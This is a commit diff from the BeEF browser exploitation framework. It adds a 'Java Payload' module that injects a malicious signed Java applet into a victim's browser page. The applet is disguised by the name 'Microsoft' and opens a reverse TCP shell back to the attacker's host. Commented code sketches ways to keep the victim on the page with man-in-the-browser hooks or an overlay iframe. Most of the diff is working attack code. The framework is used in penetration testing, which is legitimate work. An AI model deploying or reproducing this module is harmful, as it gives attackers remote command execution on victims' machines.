Moved a few modules from modules/exploits/ to modules/exploits/local_host:

activex_command_execution
	mozilla_nsiprocess_interface
	window_mail_client_dos
	java_payload
	safari_launch_app

Added a couple of XSS modules:
	cisco_collaboration_server_5_xss
	serendipity_1.6_xss

modules/exploits/local_host/java_payload/command.js

@@ -0,0 +1,54 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+    var conn = '<%= @conn %>';
+    var cbHost = '<%= @cbHost %>';
+    var cbPort = '<%= @cbPort %>';
+    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
+    var applet_id = '<%= @applet_id %>';
+    var applet_name = '<%= @applet_name %>';
+
+    beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
+        null, applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
+
+
+    //TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
+    //TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.
+
+
+//TODO:     =========== persistence techniques ===========
+//    the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to
+//    download platform dependent executable (i.e. meterpreter) and then kill the applet.
+//    we have 2 options:
+//    1. use the MITB code (currently doesn't work on IE)
+//    2. create an overlay iFrame while having the applet runnin in the background
+//
+//    1. setTimeout(beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
+//    2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
+//		var MITBload = setInterval(function(){
+//				if(beef.pageIsLoaded){
+//					clearInterval(MITBload);
+//					beef.mitb.hook();
+//				}
+//			}, 100);
+
+
+
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');
+
+
+});

modules/exploits/local_host/java_payload/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        java_payload:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "Java Payload"
+            description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported."
+            authors: ["antisnatchor"]
+            target:
+                not_working: ["FF"]
+                user_notify: ["All"]

modules/exploits/local_host/java_payload/module.rb

@@ -0,0 +1,38 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Java_payload < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
+  end
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    return [
+        {'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
+        {'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host},
+        {'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666'},
+        {'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32)},
+        {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end